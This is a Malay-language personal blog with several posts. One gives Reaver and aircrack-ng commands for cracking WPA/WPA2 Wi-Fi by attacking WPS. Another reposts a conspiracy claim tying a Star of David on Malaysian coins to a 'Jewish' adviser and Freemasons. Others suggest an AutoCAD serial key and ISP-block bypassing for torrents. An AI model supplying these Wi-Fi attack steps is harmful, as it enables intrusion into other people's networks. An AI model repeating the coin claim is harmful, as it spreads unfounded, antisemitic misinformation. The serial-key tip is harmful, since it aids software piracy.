Monday, April 1, 2013

Hack WPA/WPA2 dengan Backtrack R3


Lamanya Kiddo x Update bende ni...hahaha...makumlah sibuk sana sini dengan x keje lagi lah..ape lah..asyik2 duduk je kat rumah.emmm..atleast pegi cari la kan...rezeki ade dimana2,,tapi belum sampai lagi..xpe lah..ok tanpa membuang masa lagi...kiddo share sikit pasal hack wpa nih...dah bertahun kiddo try menatang nih,.xdapat2..haahaha....okey..kita tgk tutorial kat bawah...

[Langkah Pertama]

Download file Reaver
wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

[Langkah Kedua]

extract dan install reaver 
tar zxvf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure
make
make install

[Langkah Pertama]

Letakkan adapter wifi anda di dalam monitor mode
airmon-ng start wlan0 



[Langkah Kedua]

Lakukan scan untuk mendapat senarai wifi yag ada berdekatan dengan anda
airodump-ng mon0 

[Langkah ketiga]

reaver -i mon0 -b XX:XX:XX:XX:XX -vv 
-i ====> interface yang digunakan
-b ====> BSSID untuk untuk wifi yang ingin di crack
-v ====> verbose


selesai!!...


Thursday, January 26, 2012

3 Enjin Carian yang patut korang Cuba...

Bila sebut enjin carian, mesti semua orang teringat mengenai raja kepada segala search engine iaitu Google, serta pesaing google seperti YahooBingAsk dan sebagainya.  Google memang sangat hebat, laju, lengkap dan komprehensif tetapi google bukanlah pakar dalam segala bidang.

Kali ini Kiddo ingin share mengenai 3 lagi search engine yang sangat cool, yang patut korang cuba. 

1. Taqwa.me – enjin carian Islam

Taqwa.me ialah enjin carian baru dengan tagline “the conscious search engine yang sangat cool, yang patut anda cuba. Jangan la taksub dengan google sahaja, sekurang-kurangnya bagi sedikit peluang kepada search engine lain untuk mencuri sedikit market share.
Antaramuka taqwa sangat ringkas, hanya menampakkan kotak carian dan background wallpaper, ala Bing. Selain itu, taqwa juga mempunyai fungsi untuk flag hasil carian yang korang jumpa. Katakan link website yang serp (search engine result page) itu mengandungi unsur 18+, anda boleh flag pada butang Haram. Dan jika link website itu betul2 bersih, anda boleh click pada butang Halal.
Tujuan fungsi ini ialah membantu menapis link2 yang tidak bersih daripada hasil carian enjin taqwa, sekaligus membantu pengguna dalam menjauhkan diri daripada melakukan maksiat mata.
Link: Taqwa.me

2. Wolfram Alpha

Wolfram Alpha ialah search engine yang berfungsi untuk memaparkan data mengikut query yang masukkan, dan ianya jauh lebih versatil berbanding Google jika digunakan untuk tujuan research dan akademik.
Sebagai contoh, Kiddo masukkan query 3x^5-5x^3+x+m ke dalam kotak carian dan result akan dipaparkan dalam masa kurang 1 saat. Query yang Kiddo masukkan ialah soalan matematik dan memerlukan penyelesaiaan yang panjang dan rumit.
Dengan Wolfram Alpha, soalan matematik tahap tinggi ataupun soalan2 berkaitan sains, kejuruteraan etc boleh diselesaikan dengan mudah. Ini kerana Wolfram Alpha boleh memaparkan jawapan kepada soalan yang korang masukkan beserta graph serta jalan kira, lengkap dalam masa beberapa saat sahaja.

3. TinEye – reverse image search

TinEye ialah enjin carian untuk mencari sumber asal bagi gambar yang telah diedit, seperti penambahan watermark, superimposed dan sebagainya. Ia juga berguna untuk korang mencari gambar asal yang dalam resolusi tinggi dan bukannya gambar yang telah di-cropped atau telah di-resize.
Sebagai contoh, Kiddo memasukkan gambar superimposed ini ke dalam tineye, dan tineye berjaya mencari gambar asal yang belum diedit, sungguh cool.

Jika korang ada idea mengenai search engine lain yang lebih cool, boleh bagitahu di ruangan komen ya!

Lambang Bendera Israel Kat Duit Syiling Baru Malaysia? Betul Ke ?

MUNGKIN ramai org yang sudah mengetahui tentang berita kemunculan matawang syiling baru Malaysia yang diumumkan di laman sesawang rasmi Bank Negara Malaysia baru-baru ini [BNM].

Pembaharuan yang jelas boleh diperhatikan, Bank Negara Malaysia akan mengeluarkan duit syiling berwarna kuning keemasan dengan nilai RM 0.50 dan RM 0.20 di samping duit syiling bernilai RM0.10 dan RM0.05 bewarna perak dengan cetakan corak yang baru.
Namun begitu, satu perkara yang agak mengejutkan apabila dilihat jelas terdapat cetakan corak “Star of David” yang menyerupai bendera Israel pada duit syiling baru bernilai RM0.10. Rujuk gambar di bawah ini. 
Persoalannya, adakah “Star of David” sengaja dicetak pada duit syiling terbaru ini atau ia skadar suatu kebetulan? Apa perlunya lambang bintang enam ini diguna untuk menggantikan lambang bulan dan bintang pada syiling lama? 

Jika dilihat, lambang bulan dan bintang pada duit syiling sebelum ini menggambarkan Islam sebagai agama rasmi Malaysia. Jika “Star of David” pula digunakan, adakah ia menggambarkan sokongan secara tersirat Malaysia kepada negara Yahudi Israel dan agenda Freemason? 
Jelas sekali, inilah hasil nasihat Yahudi APCO yang dibayar RM77 juta setahun oleh kerajaan sebagai penasihat pentadbiran kerajaan Rosmah Mansor.

“Sengaja tak mahu pakai lambang bulan dan bintang, tak mahu dunia tahu Islam agama rasmi Malaysia…”
Sumber : Milosuam

Tuesday, January 17, 2012

Kaedah popular untuk hack password Wifi part 1

Kiddo mendapat banyak permintaan kawan2 untuk menulis tutorial tentang bagaimana untuk hack password rangkaian wayarles atau crack password WiFi. Sedangkan Kiddo sendiri masih lagi terkapai2 macamana nak hack atau crak menatang tuh..Sebenarnya, terdapat banyak tools yang disediakan secara percuma dan video YouTube yang menjelaskan tentang bagaimana korang boleh melakukan hack wifi sendiri.Sepatut nye korang explore dan buat la experimen sendiri macamna bende tu bekerja kan??banyak2 kan lah bertanye kat atuk google tu k...supaya korang paham dan pandai guna sendiri..dan INGAT..korang punye usaha sume free sebab korang yang bt sendiri dengan titik peluh korang, kalo suruh org lain ajar depan mate bukan free..mesti ade imbuhan jgak untuk org yang ajar dan bukak kelas hacking tu walaupun personally..haahaha,,

Jika korang sedang mencari kaedah yang paling mudah dan bekerja, 2 software popular yang boleh korang gunakan untuk hack password wifi Backtrack OS dan Beini 1.2.1.Untuk Beini 1.2.1 tu nanti lah kiddo buat...malas sey nak menaip...so akan datang kiddo post lah...Software tersebut ialah :-BackTrack OS
Backtrack OS adalah satu distro Linux yang khusus untuk keselamatan  profesional dan sengaja diciptakan untuk penguji penembusan. OS ini mengandungi banyak alat yang berguna untuk wayarles hacking, ujian penembusan, mengeksploitasi pelayan dan banyak lagi.Korang boleh mencari banyak video YouTube mengajar pengguna bagaimana untuk menggodam WiFi menggunakan Backtrack OS.

Apa itu ISO Disk Image?

ISO Disk Image(.iso) adalah jenis file image. Ada banyak jenis file image, yang terkenal ya .iso tadi. File image .iso ini biasanya digunakan sebagai file copy yang sama sepertinya, termasuk jika program yang dicopy adalah program yang bootable (yang boleh digunakan untuk booting). Misalnya korang mempunyai installer Windows 7, terus dicopy pada  DVD lain. Biasanya cara ini menyebabkan installer tersebut tidak boleh dibootable lagi.Untuk hasil yang sama seperti DVD original, korang perlu buat  installer tadi menjadi file image. Ada banyak program untuk membuat file .iso. Dan untuk membuat file .iso menggunakan software ni amat mudah dan senang.Korang leh download ISO Creator kat sini okey....

Monday, January 9, 2012

Lajukan Download Menggunakan UltraVPN.



Kiddo pasti ramai pengguna internet di malaysia ini menggunakan torrent. Ini kerana dengan torrent, kita boleh dapat pelbagai file seperti Game, Movie, Lagu, dan pelbagai lagi. Tetapi selaju manakah proses download korang?




Kali ni kiddo nk share pasal lajukan torrent korang dengan UltraVPN.. 

VPN yang kiddo gunakan pula adalah UltraVPN daripada UltraReach Internet Corp. U.S.A. Mereka telah mengeluarkan UltraVPN versi 1.0. Korang boleh mendownload UltraVPN disini. Jika link download tidak berfungsi, korang pergi ke Web ultrasurf disini.
Cara menggunakannya cukup mudah.
  1. Download UltraVPN
  2. Extract folder .zip ultravpn
  3. Double click untuk run UltraVPN (tidak perlu install)
  4. Biarkan UltraVPN connect dengan server sehingga berjaya
  5. Selesai. Sekarang, anda sudah bypass sekatan ISP (untuk mendownload).
Selamat Mencuba,,,...

Tuesday, December 20, 2011

Draftsight untuk file .dwg

Tajuk entri kali ini Kiddo nak bagitau sofware untuk AutoCAD2007...Kiddo sendiri tertanya2 mana nak cari serial key dia..bahkan kne download sana sana sini nak cari serial key die...hampeh semua xde,,dan x dpat pun..Beberapa orang rakan bertanyakan pada Kiddo, ada tak software AutoCAD percuma. Ada tak software AutoCAD free. Kiddo cakap ada, download je.serial key??yang tu nanti la Kiddo bt cmna.. Software autacad yang lain semua berbayar termasuklah beli CD AutoCAD cetak rompak pun ade serial key..kalo salah skali pun tetap x leh nak install..Serial key Autocad  yg boleh digunapakai adalah 111-1111111(semua 1)..1 malaysia...hahaha..

Sebenarnya, ada satu software yang seakan sama dengan AutoCAD jgak. Kiddo dapat maklumat pasal  software ni mggu lepas. Maklumlah, Software AutoCAD tu kan mahal, jadi Kiddo terpaksa bagitau dan cari solution yang lain. Bukan setakat murah sahaja, malah software yang kiddo  jumpa ini PERCUMA. Tak perlu bayar satu sen pun. Cuma kena update atau renew setiap tahun. Setakat ini masih lagi PERCUMA.  Nama software ini adalah DRAFTSIGHT.

Draftsight adalah satu software untuk menghasilkan lukisan 2D secara percuma. Ia boleh membantu pada pelukis-pelukis pelan atau seangkatan dengan mereka atau mengedit fail 2d. Lebih tepat lagi ia berupaya membaca dan mengedit apa jenis fail drawing yang mempunyai extension .dwg. Bila sebut sahaja pasal drawing AutoCAD pasti nama failnya .dwg.

Kiddo dah cuba install DRAFTSIGHT pada satu pc yang setiap hari bergelumang dengan drawing dan fail .dwg. Memang boleh pakai. Tak ada masalah. Cuba pada permulaannya, kena study sikit. Sebabnya ada beberapa fungsi kawalan di AUTOCAD tidak sama dengan Draftsight. Apa pun yang penting ianya PERCUMA dan boleh digunapakai untuk kerja-kerja drawing dengan berkesan.

Untuk mendownload DRAFTSIGHT sila layarai website INI. Jika korang tanya kiddo berapa bintang yang harus kiddo berikan kepada Software DRAFTSIGHT, kiddo berikan 4 bintang dari 5 bintang..kire bolehlah... Memang terbaik. Jimat dan efisyen. Apa lagi geng,  Selamat mencuba.

place of visitor online:-